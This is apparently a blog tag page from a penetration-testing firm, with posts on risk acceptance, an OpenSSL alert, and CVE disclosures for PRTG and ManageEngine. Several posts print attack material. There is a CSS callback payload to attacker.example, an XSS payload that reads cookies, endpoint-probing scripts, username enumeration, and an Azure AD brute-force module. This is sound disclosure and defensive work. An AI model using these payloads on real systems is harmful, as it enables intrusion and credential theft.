Tag: Vulnerability Management

  • Accepting Penetration Test Risks & How Compensating Controls Can Help

    Accepting Penetration Test Risks & How Compensating Controls Can Help

    As the head of project management at Raxis, I have been a part of many customer debriefing calls. Generally, these calls entail the penetration tester discussing the findings in the report and answering questions, such as which findings to prioritize or the best options for correcting them.

    In some cases, though, there is no way to fix the finding, at least in the near term. Organizations that are looking to correct all findings in order to provide the most secure environment for their customers and to meet compliance requirements look to our team for advice.

    In this blog, I’ll discuss the options of accepting risks or using compensating controls to limit the risks as much as possible until a larger solution can be implemented.


    ACCEPTING RISKS

    When dealing with penetration test findings, organizations sometimes have to accept certain risks instead of fixing them immediately. This decision is often part of a broader risk strategy, and in many cases fixing the issues is simply not feasible, at least in the short term.

    Resource constraints include financial limitations, such as when the cost of fixing the vulnerability outweighs the potential impact of an exploit. Time constraints also come into play when fixing the vulnerability might delay critical projects or updates.

    In these cases, we often recommend that the organization thoroughly discuss the risk and, if appropriate, formally accept it. The risk is still there, but the proper stakeholders within the company will understand what is involved and document their acceptance of it.

    When deciding to accept penetration test risks, organizations should follow a formal risk acceptance process:

    • Thoroughly document the vulnerability and associated risk
    • Perform a detailed impact analysis, including input from several departments when necessary
    • Identify and implement compensating controls
    • Get sign-off from appropriate stakeholders, such as a CISO or CIO
    • Set a timeline to re-evaluate the risk
    • Monitor the risk closely

    COMPENSATING CONTROLS

    Compensating controls can include several measures that are worthwhile to have in place at any time in case of newly discovered vulnerabilities or other issues. Examples of compensating controls include:

    • Encrypting sensitive data at rest and in transit
    • Implementing strong access controls, such as least privilege and multi-factor authentication
    • Enhancing monitoring and alerting for the affected systems to allow for rapid detection and response if the vulnerability is exploited
    • Network segmentation to contain the spread of an attack
    • Keeping systems as up-to-date as possible with available patches

    LOWERING FINDING RISKS WITH MITIGATION

    Often vulnerabilities that cannot be fixed involve legacy software that no longer receives updates from the vendor but is necessary to business operations. In these cases, until the legacy systems can be replaced, organizations can decrease risk by segmenting the system to an entirely separate area of the internal network. This way, if a compromise occurs, the rest of the network is protected.

    While this does not remove the finding from the penetration test report, we are able to lower the risk rating of the finding if our customer lets us know and gives us access to verify that the segmentation is correctly in place.

    Another case we often see involves custom web or mobile applications and APIs. Updating a codebase may be a major effort that requires planning and waiting for resources to become available to make the changes. In other cases, custom code relies on vendor APIs, and changes must wait for vendor API updates.

    Each of these cases is unique, but there may be opportunities to limit access to the at-risk functionality or to put in place strong compensating controls.

    CONCLUSION

    We understand that many factors come into play when working to keep your company and customers secure. Options are available that allow organizations to remain as secure as possible while working toward a more permanent solution.

  • RAXIS THREAT ALERT: VULNERABILITY IN OPENSSL v3.0.x

    RAXIS THREAT ALERT: VULNERABILITY IN OPENSSL v3.0.x

    UPDATE: Subsequent to publication of this blog post, the OpenSSL vulnerabilities were assigned CVE-2022-3786 and CVE-2022-3602, patches were released by OpenSSL, and the threat level was downgraded from “critical” to “high.”

    In the cyberworld, news of a critical vulnerability affecting OpenSSL versions 3.0 – 3.0.6 will likely be the scariest part of Halloween ’22, especially since the last ‘critical’ rating from OpenSSL went to the aptly named “Heartbleed” bug back in 2014.

    There is a lot of buzz online about this vulnerability, but here’s what we know for sure:

    • It really could be that serious. The OpenSSL project management team says it’s critical, and they are not known for crying ‘wolf’ without reason. By the organization’s standards, ‘critical’ means it may be easily exploitable, many users could be affected, and the destructive potential is high.
    • So, you definitely need to patch. OpenSSL’s software is ubiquitous in the world of security and encryption. Though 98% of instances are still version 1.1.1, the 1.5% using version 3.0.x includes some very popular Linux distributions, including Red Hat Enterprise Linux (RHEL) 9.x, Ubuntu version 22.04, and many others.
    • And you need to patch ASAP. OpenSSL is making the patch available tomorrow, November 1, between 8 AM and noon U.S. Eastern Time. According to an OpenSSL spokesman, the rationale behind announcing the vulnerability before the patch is ready is to give organizations time to identify the systems that need to be patched and assemble the resources necessary to do so.

    How can you be sure that all your relevant systems are patched? Once you’ve installed the updates, a comprehensive assessment of each host can ensure you’ve properly updated. As always, a Raxis penetration test can also reveal unpatched or out-of-date software from OpenSSL or any other provider. What’s more, our team can show you proof of which assets are at risk and why.
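
    If you manage many hosts, your package manager or vulnerability scanner is the authoritative source, but here is a minimal spot check, assuming a Python interpreter is available on the host: it reports the OpenSSL build that interpreter is linked against and flags the affected 3.0.0 – 3.0.6 range.

    # Minimal spot check: report the OpenSSL build this Python runtime is linked against.
    # OpenSSL 3.0.0 through 3.0.6 are affected; 3.0.7 contains the fix.
    import re
    import ssl

    version = ssl.OPENSSL_VERSION          # e.g., "OpenSSL 3.0.2 15 Mar 2022"
    print(version)
    match = re.search(r"\b3\.0\.(\d+)\b", version)
    if match and int(match.group(1)) < 7:
        print("Affected 3.0.x build -- upgrade to 3.0.7 as soon as it is available.")

    Note that this only covers the OpenSSL library that one runtime uses; statically linked applications and other installed copies still need to be inventoried separately.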

  • CVE-2022-35739: PRTG Network Monitor Cascading Style Sheets (CSS) Injection

    CVE-2022-35739: PRTG Network Monitor Cascading Style Sheets (CSS) Injection

    I’m Matt Mathur, lead penetration tester here at Raxis. I recently discovered a cascading style sheet (CSS) injection vulnerability in PRTG Network Monitor.

    Summary

    PRTG Network Monitor does not prevent custom input for a device’s icon, which can be modified to insert arbitrary content into the style tag for that device. When the device page loads, the arbitrary CSS is inserted into the style tag, loading malicious content. Because PRTG Network Monitor blocks double-quote (") characters and modern browsers disable JavaScript support in style tags, this vulnerability could not be escalated into a Cross-Site Scripting vulnerability.

    Proof of Concept

    The vulnerability lies in a device’s properties and how they are verified and displayed within PRTG Network Monitor. When editing or creating a device, the device’s icon value is not verified to be one of the icon selections, and any text can be inserted in its place, as shown here:

    CSS Injection Payload

    When the device’s icon is then loaded in any subsequent pages (e.g., the Devices page), the content is loaded unescaped inside of the style tag, as shown below:

    Payload Insertion Point

    This allows malicious users to insert (almost) any CSS they want in place of the icon. A malicious user can cause an HTTP request to an arbitrary domain/IP address by setting a background-image property in the payload, as shown here:

    Payload Execution Causing HTTP Request to Controlled Server
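
    For illustration, a payload of this kind might simply set a background-image property that points at a server the attacker controls (the URL below is a placeholder):

    background-image: url("https://attacker.example/prtg-callback");

    When the style tag containing the injected declaration is rendered, the victim's browser fetches that URL, confirming to the attacker that the injection executed.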

    The impact of this vulnerability is reduced because modern browsers prevent JavaScript in style tags and PRTG Network Monitor blocks double-quote (") characters in the payload. These factors prevent the vulnerability from being escalated into a Cross-Site Scripting vulnerability.

    Affected Versions

    Raxis discovered this vulnerability on PRTG Network Monitor version 22.2.77.2204.

    Remediation

    A fix for CVE-2022-35739 has not been released. When a fix is released, upgrade to the newest version to fully remediate the vulnerability. In the meantime, Raxis recommends limiting the number of users who can edit devices to reduce the impact of the vulnerability. CVE-2022-35739 has minimal damage potential and is difficult to exploit, so it does not warrant additional protections while a fix is pending.

    Disclosure Timeline
    • July 7, 2022 – Vulnerability reported to Paessler Technologies.
    • July 8, 2022 – Paessler Technologies begins investigating vulnerability.
    • July 14, 2022 – CVE-2022-35739 assigned to this vulnerability.
    • August 8, 2022 – Outreach to Paessler Technologies without response.
    • October 4, 2022 – Second outreach to Paessler Technologies without response.
    • October 7, 2022 – Third outreach to Paessler Technologies without response.
    • October 21, 2022 – Original blog post detailing CVE-2022-35739 released.
  • CVE-2022-26653 & CVE-2022-26777: ManageEngine Remote Access Plus Guest User Insecure Direct Object References

    CVE-2022-26653 & CVE-2022-26777: ManageEngine Remote Access Plus Guest User Insecure Direct Object References


    I’m Matt Dunn, lead penetration tester at Raxis, and I’ve uncovered a couple more ManageEngine vulnerabilities you should know about if your company is using the platform.

    Summary

    I discovered two instances in ManageEngine Remote Access Plus where a user with Guest permissions can access administrative details of the installation. In each case, an authenticated ‘Guest’ user can make a direct request to the /dcapi/ API endpoint to retrieve information. This allows the ‘Guest’ user to discover information about the connected Domains as well as the License information for the installation.

    Proof of Concept

    The two vulnerabilities are similar in that they allow a user with ‘Guest’ level permissions to access details about the installation. Each CVE refers to a specific piece of information that the user can retrieve, as detailed below:

    CVE-2022-26653 – The ‘Guest’ user can retrieve details of connected Domains.

    CVE-2022-26777 – The ‘Guest’ user can retrieve details about the installation’s License.

    The user with ‘Guest’ permissions can access all the Domain’s details, including the connected Domain Controller, the account used for authentication, and when it was last updated, as shown here:

    Guest User Can Access All Domain Details

    Similarly, the ‘Guest’ user can access all the License information, including the number of users, the number of managed systems, who the license is for, and the exact build number, as shown below:

    Guest User Can Access All License Details
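
    As a rough sketch of how we verify this during testing, an authenticated ‘Guest’ session simply issues direct GET requests to the /dcapi/ API and inspects the responses. The base URL, session cookie, and resource paths below are placeholders, not confirmed endpoint names:

    # Hypothetical sketch: probe /dcapi/ resources using a Guest session.
    # The host, cookie value, and resource names are placeholders.
    import requests

    BASE_URL = "https://remoteaccessplus.example.com:9031"
    GUEST_COOKIES = {"JSESSIONID": "<guest-session-id>"}

    for resource in ("<domain-details-resource>", "<license-details-resource>"):
        resp = requests.get(f"{BASE_URL}/dcapi/{resource}", cookies=GUEST_COOKIES, verify=False)
        print(resource, resp.status_code, resp.text[:200])

    If either request returns domain or license details to a user who should only have ‘Guest’ visibility, the installation is affected.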

    Affected Versions

    Raxis discovered these vulnerabilities on ManageEngine Remote Access Plus version 10.1.2137.6.

    Remediation

    Upgrade ManageEngine Remote Access Plus to Version 10 Build 10.1.2137.15 or later which can be found here:

    Disclosure Timeline

    • February 16, 2022 – Vulnerabilities reported to Zoho
    • February 17, 2022 – Zoho begins investigation into reports
    • March 8, 2022 – CVE-2022-26653 is assigned to the Domain Details vulnerability
    • March 9, 2022 – CVE-2022-26777 is assigned to the License Details vulnerability
    • April 8, 2022 – Zoho releases fixed version 10 Build 10.1.2137.15, which addresses both vulnerabilities

    CVE Links

    CVE-2022-26653

    CVE-2022-26777

     

  • CVE-2022-25245: ManageEngine Asset Explorer Information Leakage

    CVE-2022-25245: ManageEngine Asset Explorer Information Leakage

    I’m Matt Dunn, a lead penetration tester at Raxis. Recently, I discovered an information leakage vulnerability in ManageEngine Asset Explorer. It is relatively minor, as it only exposes the currency that a vendor uses. Even so, it could lead to other inferred information, such as a vendor’s location based on its currency.

    Proof of Concept

    The information leakage occurs in the AJaxDomainServlet when given the action of getVendorCurrency. This servlet action does not require authentication, allowing a user to obtain a vendor’s currency with a GET request to a URL similar to the following:

    http://192.168.148.128:8011/domainServlet/AJaxDomainServlet?action=getVendorCurrency&vendorId=3

    In this example URL, we request the currency for the vendor with the specified vendorId. If the vendor doesn’t have an assigned currency, the dollar symbol is returned. If it does, the vendor’s specific currency identifier is returned, as shown here:

    Vendor Currency Revealed in Unauthenticated Request
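
    A minimal reproduction sketch follows. It issues the same unauthenticated GET request shown above; the host, port, and vendorId come from the example and would be adjusted for the target installation.

    # Sketch: unauthenticated request to the AJaxDomainServlet getVendorCurrency action.
    # Host, port, and vendorId are taken from the example above; adjust for the target.
    import requests

    url = "http://192.168.148.128:8011/domainServlet/AJaxDomainServlet"
    params = {"action": "getVendorCurrency", "vendorId": 3}

    resp = requests.get(url, params=params)
    print(resp.status_code, resp.text)   # "$" if no currency is assigned, otherwise the vendor's currency
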
    Affected Versions

    Raxis discovered this vulnerability on ManageEngine Asset Explorer 6.9 Build 6970.

    Remediation

    Upgrade ManageEngine Asset Explorer to Version 6.9 Build 6971 or later, which can be found here:

    Disclosure Timeline
    • February 14, 2022 – Vulnerability reported to Zoho
    • February 15, 2022 – Zoho begins investigation into report
    • February 16, 2022 – CVE-2022-25245 is assigned to this vulnerability
    • March 9, 2022 – Zoho releases fixed version 6.9 Build 6971

     

  • CVE-2022-24681: ManageEngine AD SelfService Plus Stored Cross-Site Scripting (XSS)

    CVE-2022-24681: ManageEngine AD SelfService Plus Stored Cross-Site Scripting (XSS)

    I’m Matt Dunn, a lead penetration tester here at Raxis. Recently, I discovered a stored Cross-Site Scripting vulnerability in Zoho’s ManageEngine AD SelfService Plus.

    Summary

    The vulnerability exists in the /accounts/authVerify page, which is used for the forgot password, change password, and unlock account functionalities.

    Proof of Concept

    The vulnerability can be triggered by inserting HTML content, specifically tags that support JavaScript, into the first or last name of an Active Directory user. The following payload was inserted as a proof of concept to reflect the user’s cookie in an alert box:

    <img src=x onerror="alert(document.cookie)"/>

    An example of this in the Last Name field of one such user is shown here:

    Stored XSS Payload

    The next time that user forgets their password, attempts to change it, or is locked out of their account and loads the authVerify page, their name is presented without being sanitized. The unescaped HTML as loaded can be seen in Figure 2:

    Unescaped JavaScript Tags

    After the user attempts to reset their password, the malicious content is executed, as shown in Figure 3:

    JavaScript Execution to Display User's Cookie in an Alert Box

    If the user must change their password on login, the malicious content is executed, as shown in Figure 4:

    Payload Execution on Change Password Page

    If the user attempts to unlock their account, the malicious content is executed, as shown in Figure 5:

    Payload Execution on Account Unlock
    Affected Versions

    Raxis discovered this vulnerability on ManageEngine AD SelfService Plus 6.1 Build 6119.

    Remediation

    Upgrade ManageEngine AD SelfService Plus to Version 6.1 Build 6121 or later immediately:

    Disclosure Timeline
    • January 22, 2022 – Vulnerability reported to Zoho
    • January 22, 2022 – Zoho begins investigation into report
    • February 9, 2022 – CVE-2022-24681 is assigned to this vulnerability
    • March 7, 2022 – Zoho releases fixed version 6.1 Build 6121

     

  • What is Web App Pentesting? (Part Two)

    What is Web App Pentesting? (Part Two)

    I’m Matt Dunn, a lead penetration tester at Raxis. This is the second of a two-part series, aimed at explaining the differences between authenticated and unauthenticated web application testing. I’ll also discuss the types of attacks we attempt in each scenario so you can see your app the way a hacker would.

    Although some applications allow users to access some or all of their functionality without providing credentials – think of simple mortgage or BMI calculators, among many others – most require some form of authentication to ensure you are authorized to use them. If there are multiple user roles, authentication will also determine what privileges you have and/or what features you can access. This is commonly referred to as role-based access control.

    As I mentioned in the previous post, Raxis conducts web application testing from the perspectives of both authenticated and unauthenticated users. In authenticated user scenarios, we also test the security and business logic of the app for all user roles. Here’s what that looks like from a customer perspective.

    Unauthenticated Testing

    As the name suggests, testing as an unauthenticated user involves looking for vulnerabilities that are public-facing. The most obvious is access: Can we use our knowledge and tools to get past the authentication process? If so, that’s a serious problem, but it’s not the only thing we check.

    In previous articles and videos, we’ve talked about account enumeration – finding valid usernames based on error messages, response lengths, or response times. We will see what information the app provides after unsuccessful login attempts. If we can get a valid username, then we can use other tools and tactics to determine the password. As an example, see the two different responses from a forgot password API for valid and invalid usernames below:

    Different Responses for Valid and Invalid Usernames
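
    As a simple illustration of how we compare those responses, the test boils down to sending the same forgot-password request for a known-invalid username and a suspected-valid one, then diffing the status code, response length, and timing. The endpoint and parameter name below are hypothetical:

    # Hypothetical sketch: compare forgot-password responses for two usernames.
    # The URL and JSON field name are placeholders for the application under test.
    import time
    import requests

    URL = "https://app.example.com/api/forgot-password"

    def probe(username):
        start = time.monotonic()
        resp = requests.post(URL, json={"username": username})
        return resp.status_code, len(resp.content), round(time.monotonic() - start, 3)

    for name in ("definitely-not-a-user-xyz", "jsmith"):
        print(name, probe(name))   # differing codes, lengths, or times suggest enumeration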

    From an unauthenticated standpoint, we also will try injection attacks, such as SQL Injection, to attempt to break past login mechanisms. We’ll also look for protections using HTTP headers, such as Strict-Transport-Security and X-Frame-Options or Content-Security-Policy, to ensure users are as secure as they can be.
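
    A quick way to check those protections is to request a page and list which of the headers are missing from the response. This is a minimal sketch using a placeholder URL:

    # Sketch: report which of the security headers discussed above are missing.
    import requests

    EXPECTED = ["Strict-Transport-Security", "X-Frame-Options", "Content-Security-Policy"]

    resp = requests.get("https://app.example.com/", allow_redirects=True)   # placeholder URL
    missing = [header for header in EXPECTED if header not in resp.headers]
    print("Missing security headers:", missing or "none")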

    With some applications, we can use a web proxy tool to see which policies are enforced on the client-side interface and which are enforced on the server side. In a future post, we’ll go into more detail about web proxies. For now, it’s only important to know that proxies sometimes reveal vulnerabilities that allow us to bypass security used on the client and allow us to interact with the server directly.

    As an example, fields that require specific values, such as an email field, may be verified to be in the proper format on the client side (i.e., using JavaScript). Without proper safeguards in place, however, the server itself might accept any data, including malicious code, entered directly into that same field. In practice, this can be bypassed, leading to attacks such as Cross-Site Scripting, as shown in my CVE-2021-27956, which bypasses email verification.

    Authenticated Testing

    During an authenticated web application test, we use many of the same tactics, toward the same ends, as we do with unauthenticated tests. However, we have the added advantage of user access. This vantage point exposes more of the application’s attack surface and, with it, more potential vulnerabilities. This is why we recommend authenticated testing: to ensure that even a malicious authenticated user cannot compromise the application.

    Once authenticated, we check whether the app restricts users to the level of access that matches its business logic. This might mean we log in with freemium-level credentials and see if we can get to paid-users-only functionality. Or, in the role of a basic user, we may try to gain administrator privileges.

    As with an unauthenticated test, we also see how much filtering of data is done at the interface vs. the server. Some apps have very tight server-level controls for authentication but rely on less-restrictive policies once the user is validated.

    Though it may seem simple from the outside, one of the hardest things for web app developers to secure is file uploads.

    This is another topic we’ll explore further in a future post; however, one good example of the complexity involved is photo uploads. Many apps enable or require users to create profiles that include pictures or avatars. One way to restrict the file type is by accepting only .jpg or .png file extensions. Hackers can sometimes get past this restriction by giving an executable file a double extension – malware.exe.jpg, for example.
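
    To illustrate why extension checks alone fall short, here is a minimal sketch of upload validation that rejects double extensions and also verifies the file’s magic bytes instead of trusting the name. The allowed types and helper are illustrative only, not a complete defense:

    # Sketch: validate an uploaded image by extension *and* magic bytes.
    # "malware.exe.jpg" passes a naive endswith(".jpg") check, so we reject
    # extra extensions and confirm the file header matches the claimed type.
    ALLOWED = {".jpg": b"\xff\xd8\xff", ".png": b"\x89PNG\r\n\x1a\n"}

    def is_allowed_image(filename: str, data: bytes) -> bool:
        parts = filename.lower().rsplit(".", 2)
        if len(parts) != 2:                     # no extension, or a double extension
            return False
        magic = ALLOWED.get("." + parts[1])
        return magic is not None and data.startswith(magic)

    print(is_allowed_image("avatar.jpg", b"\xff\xd8\xff\xe0"))   # True
    print(is_allowed_image("malware.exe.jpg", b"MZ"))            # False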

    Another problem is that malicious code can be inserted into otherwise legitimate file types such as Word documents or spreadsheets. For many apps, however, it’s absolutely necessary to allow these file types. When we encounter such situations, we often work with the customer to recommend other security measures that allow the app to work as advertised but that also detect and block malware.

    Conclusion

    As a software engineer by training, one advantage I have in testing web applications is understanding the mindset of the developers working on them. People building apps start with the goal of creating something useful for customers. As time goes on, the team changes or users’ needs change, and sometimes vulnerabilities are left behind. This can happen in expected ways, such as outdated libraries, or unexpected ways, such as missing access control on a mostly unused account type.

    At Raxis, we employ a group of experts with diverse experiences and skillsets who will intentionally try to break the app and use it improperly. Having testers who have also developed applications gives us empathy for app creators. Even as we attack their work, we know that we are helping them remediate vulnerabilities and making it possible for them to achieve their application’s purpose.

    Want to learn more? Take a look at the first part of our Web Application Penetration Testing discussion.

  • How to Hire a Penetration Testing Firm – Part 1

    How to Hire a Penetration Testing Firm – Part 1

    I’m Bonnie Smyre, Raxis’ Chief Operating Officer. Penetration testing is a niche in the cybersecurity field, but one that is critical to the integrity of your network and your data. This is the first of a two-part guide to help you select the right firm for your needs.

    Step 1: Identify Your Why

    There are lots of reasons why companies should routinely do penetration testing. The most important is to understand your vulnerabilities as they appear to hackers in the real world and work to harden your defenses. It may also be that your industry or profession requires testing to comply with certain laws or regulations. Or perhaps you’ve been warned about a specific, credible threat.

    Whatever your reasons for seeking help, you’ll want to look for a firm that has relevant experience. For example, if you run a medical office, you’ll need a penetration testing company that knows the ins and outs of the Health Insurance Portability and Accountability Act (HIPAA). If you’re a manufacturer with industrial control systems, you’ll need a company that understands supervisory control and data acquisition (SCADA) testing. The point is to make sure you know your why before you look for a pentest firm.

    See a term you don’t recognize? Look it up in our glossary.

    Step 2: Understand What You Have at Risk

    A closely related task is to be clear about everything you need to protect. Though it might seem obvious from the above examples, companies sometimes realize too late that they are custodians of data seemingly unrelated to their primary mission. A law firm, for instance, might receive and inadvertently store login credentials used to access clients’ medical transcripts or bank accounts. Though its case files are stored on a secure server, a clever hacker could potentially steal personally identifiable information (PII) from the local hard drives.

    Step 3: Determine What Type of Test You Need

    General use of the term “pentesting” can cover a broad range of services, from almost-anything-goes red team engagements to vulnerability scans, though the latter is not a true penetration test. In last week’s post, lead penetration tester Matt Dunn discussed web application testing. There are also internal and external tests, as well as wireless, mobile, and API testing, to name a few. Raxis even offers continuous penetration testing for customers who need the ongoing assurance of security in any of these areas.

    Raxis offers several types of penetration tests depending on your company’s needs:

    Step 4: Consult Your Trusted Advisors

    Most companies have IT experts onboard or on contract to manage and maintain their information systems. You may be inclined to start your search for a penetration testing service by asking for recommendations from them – and that’s a good idea. Most consultants, such as managed service providers (MSPs), value-added resellers (VARs), and independent software vendors (ISVs), recognize the value of high-quality, independent penetration testing.

    In the case of MSPs, it might even be part of their service offerings. However, it might make sense to insist on an arm’s-length relationship between the company doing the testing and the people doing the remediation.

    If your provider is resistant to pentesting, it might be because the company is concerned that the findings will reflect poorly on its work. You can work through those issues by making it clear that you share an interest in improving security and that’s the purpose for testing.

    The downloadable PDF below includes this list of Raxis services with an explanation of what we test and a brief description of how we go about it.

    Raxis Penetration Testing Services
    Step 5: Consider Ratings and Review Sites

    Another starting point – or at least a data point – is review and rating sites. This can be incredibly helpful since such sites usually include additional information about the services offered, types of customers, pricing, staffing, etc. That gives you a chance to compare the areas of expertise with the needs you identified in steps one and two. It can also introduce you to companies you might not have found otherwise.

    Here are some resources you might find helpful as a start:

    Step 6: Check References

    Once you have your short list of companies, it’s a good idea to talk to some of their customers, if possible, to find out what they liked or didn’t like about the service. Ask about communications. Were they kept in the loop about what was going on? Did the company explain both successful and unsuccessful breach attempts? Did they get a clear picture of the issues, presented as actionable storyboards?

    In addition, it’s a good idea to ask about the people they worked with. Were they professional? Was it a full team or an individual? Did they bring a variety of skillsets to the table? Did they take time to understand your business model and test in a way that made sense? It’s important to remember here that many pentesting customers insist on privacy. The company may not be able to provide some references, and others may not be willing to discuss the experience. However, some will, and that will add to your knowledge base.

    If you’ve completed steps 1 through 6, you should be armed with the information you need to begin interviewing potential penetration testing companies. You’ll be able to explain what you need and gauge whether they seem like a good match or not. And you’ll know how their customers feel about their service.

    If you found this post helpful, make sure to follow our blog. In the weeks ahead, we’ll be discussing the questions you should ask potential pentesting companies – and the answers you should expect to hear.

    Want to learn more? Take a look at the second part in our How to Hire a Penetration Testing Firm Series.

  • What is Web Application Penetration Testing?

    What is Web Application Penetration Testing?

    I’m Matt Dunn, a lead penetration tester at Raxis. In this series of posts, I’m going to introduce you to the Raxis method of penetration testing web applications. We’ll start with a look at what a web app test involves and how it differs from the network testing we do.

    By their very nature, web apps deserve special scrutiny because, in most cases, they are designed to be accessible to a broad base of users, often with different roles that convey higher levels of privilege or access. Additionally, they often provide wide-ranging functionality, from shopping and banking transactions to accessing healthcare data. With that accessibility and functionality comes exposure to a wide range of threats from malicious actors who want to exfiltrate data, modify the application, or otherwise disrupt its operation.

    When Raxis performs a web application penetration test, we typically approach it from the viewpoint of both unauthenticated and authenticated user roles. In many cases, some of the app’s functionality is going to be behind some form of authentication. We’ll go into greater detail about authenticated and non-authenticated tests in a subsequent post. For now, however, we’ll limit the discussion to tests in which we are given credentials for all user roles.

    Armed with the appropriate credentials, we examine all the functionality of the app to find out what features are accessible to users and how the application is intended to work. Can users’ profiles be changed? Are users allowed to upload files? Where can the user input their own content? What is each user supposed to be allowed to do? These are just some of the questions we’re looking to answer in the beginning of the test.

    Once we know what the app should do, we’ll test all these features to see if the business logic is correct. For example, an app may allow only administrators to delete uploaded files. So, we’ll attempt to circumvent that restriction and see if we can accomplish that with lower-privileged credentials.
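
    In practice, that check can be as simple as replaying the administrator-only request with the lower-privileged user’s session and confirming the server refuses it. The endpoint and token below are hypothetical:

    # Hypothetical sketch: replay an admin-only delete with a low-privileged session.
    # The endpoint, file ID, and bearer token are placeholders for the app under test.
    import requests

    URL = "https://app.example.com/api/files/1234"
    low_priv_headers = {"Authorization": "Bearer <basic-user-token>"}

    resp = requests.delete(URL, headers=low_priv_headers)
    if resp.status_code in (401, 403):
        print("Access control enforced server-side.")
    else:
        print(f"Potential business-logic flaw: delete returned {resp.status_code}")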

    Raxis approaches a web application test from the perspective of unauthenticated users and authenticated users in multiple roles when more than one role exists.


    Next, we will try to exploit the app’s features. For instance, we’ll test the various input fields to see if we can insert malicious code. If so, the app may be vulnerable to cross-site scripting (XSS) – a topic I’ve covered extensively on our blog and YouTube channel. In a similar manner, we’ll test areas where we can upload files to see if we can upload malicious content as part of an attack.

    One question we get from time to time is whether web application testing is included as part of our network penetration tests. The answer is no, for two reasons: First, it’s unlikely that, within the time of a well-scoped network test, we will be able to find credentials to all roles and parts of your web app. Second, network tests are broader in scope and identify the highest risk vulnerabilities across the entire network (as time allows). Depending on other findings, we often test the accessible pages as well as the authentication features. These include logins and “forgot password” pages, to name just a couple. Our goal is to see if we can gain unauthorized access, perform account enumeration, or attack the application externally. But we won’t test as a verified user unless we’re able to gain authenticated access, and even then, we will not focus on the web app in the same depth as we would in a web app test.

    That’s what makes web application testing so important. And with so many companies relying on (or even built around) web apps, it makes sense to conduct these tests regularly and address the findings in order of priority. Even if you are already performing network penetration tests, I strongly recommend that you conduct specific web application tests as well.

    Want to learn more? Take a look at the second part of our Web Application Penetration Testing discussion.

  • Entering the Metaverse: You are the Real Commodity

    Entering the Metaverse: You are the Real Commodity

    In case you’ve been locked in a cave for the past few months, I’m writing to warn you that the metaverse is nearly here. And by “nearly here,” I mean that it has been here for years in one form or another. The difference now is that Facebook changed its (corporate) name and the media has decreed that the metaverse shall be its new shiny object for a while.

    Reality 2.0?

    As to whether the metaverse is a cause for concern or celebration, the answer is both. It will certainly bring exciting new opportunities, especially on the social front. People have a need to interact with each other – as evidenced by the success of social media — and this technology promises to make it more convenient and fun. Imagine being able to feel like you’re sitting next to a family member who is, in reality, 2,000 miles away. 

    There are other benefits as well. For example, doctors might perform complicated surgeries for patients on the other side of the world. We could all climb Mt. Everest, dive the Great Barrier Reef, or trek to Machu Picchu without exposing ourselves to the existential dangers or creating more environmental impact. Our imaginations are really the only limits in a virtual world.

    As an ethical hacker and penetration tester, however, I can’t help but see the downside risks as well.

    Yes, it will be hacked.

    Starting with the obvious, all the same threats that exist in the current tech world will exist in the metaverse, and there’s a chance others may be created. For example, a phishing attack could provide an attacker with permissions to control your bank account or even become you by controlling your avatar. It will become extremely important to validate the people we interact with, since “becoming” someone else’s avatar could be very convincing, even in a real-time conversation.

    Blockchain technology seems like the odds-on favorite to protect against identity theft and fraud in the virtual world, but that will bring its own set of issues. So, the cat-and-mouse games between good and evil will carry on, but the stakes could get higher as we entrust more of our lives and ourselves to the metaverse.

    “Beyond the overtly malicious threats, it’s important to remember that the new virtual world is not being created as a social experiment or an act of altruism. It is big business, plain and simple.”

    Mark Puckett

    Like any responsible corporate leaders, Zuckerberg and company are only willing to invest incredible amounts of money because they intend to make a profit that justifies the risk. It pays to think about the ways they might go about that.

    Business in, business out.

    There have already been at least two $1M+ “real estate” transactions in the metaverse. For now, these investments are mostly speculative. However, as innovations in augmented reality (AR) bring it into the mainstream, they could pay enormous dividends.

    One reason is that reams of data will be captured in real time about users and their environment. Your location, the people you talk to, the items you browse at stores, the billboards you look at, the writing you read, and the words you speak can all potentially be stored. Images of bystanders who have not agreed to be recorded could be facially recognized and stored.

    Certainly, controls will be in place to protect privacy, but a cyberattack could put this data at risk. There’s also the very real possibility that the people who own the virtual real estate will use the information they gather to control the way we experience it. 

    As just one practical example, imagine that you, in the form of your avatar, look at tents and camping gear in a store window. Without entering any information or clicking on any links, you’ve given a strong signal of interest. You might then start to notice mountains on the horizon and virtual trails along your path, and receive invitations to join clubs with similar interests.

    Sooner or later, you’ll find coupons for real-world excursions in your mail. You may even realize that some of your virtual friends are just skilled marketers or even bots.

    Hearts and minds in the mix.

    Now consider that it might not be a product, but a political candidate or point of view you’re being sold. Such an immersive experience puts a lot of power into the hands of the people who control that world.

    The most important point to remember about the metaverse is that you and I are its most important commodities. That’s why it’s helpful to know up front how much of ourselves and our privacy we’re expected and willing to give up as payment for the experience. 

    The good news is that, despite the media hype, we won’t all awaken one day as avatars. Just as social media consumed us bit by bit, so too will this new virtual world. My hope is that we truly learn the lessons from the former to improve our experience with the latter.

  • New Metasploit Module: Azure AD Login Scanner

    New Metasploit Module: Azure AD Login Scanner

    Summary

    In June of 2021, Secureworks Counter Threat Unit (CTU) discovered that the protocol used by Azure Active Directory (AD) Seamless Single Sign-On (SSO) allows for brute-forcing usernames and passwords without generating log events on the targeted tenant. In addition to brute-forcing credential pairs, the Azure endpoint returns error codes that allow for username enumeration. This post details the vulnerable endpoint, and how it can be exploited to brute-force usernames and passwords in a succinct Metasploit module.

    Vulnerability Description

    In addition to the normal Azure AD authentication workflow for SSO, which utilizes Kerberos, the usernamemixed endpoint of Autologon accepts single-factor authentication. Authentication attempts to this endpoint are in XML, as shown here:

    Example XML Authentication Request

    The Autologon endpoint takes these credentials and sends them to Azure AD to authenticate the user. If the credentials are valid, the authentication is successful, and the Autologon endpoint responds with XML containing a DesktopSsoToken, which is used to further connect and authenticate with Azure AD. When a successful logon occurs, Azure AD properly logs the event.

    However, unsuccessful authentication attempts are not logged by the tenant. If the credentials are invalid, the Autologon endpoint responds with XML containing a specific error code for the authentication attempt, as shown here:

    Detailed Error Code in XML Response

    The error code provided in this response can further be used to determine whether a username is valid, whether MFA is required, whether the user has no password in Azure AD, and more. The error codes used in the Metasploit module I developed are shown below:

    Error Codes
    Metasploit Module

    The Metasploit module (auxiliary/scanner/http/azure_ad_login) can enumerate usernames or brute-force username/password pairs based on the responses from the Autologon endpoint described above. If you have a target tenant using Azure AD SSO and usernames/passwords to validate, you can use this module by setting the following variables:

    • DOMAIN – The target tenant’s domain (e.g., bionicle.dev)
    • USERNAME or USER_FILE – A single username to test or a file containing usernames (one per line)
    • PASSWORD or PASS_FILE – A single password or a file containing passwords (one per line)

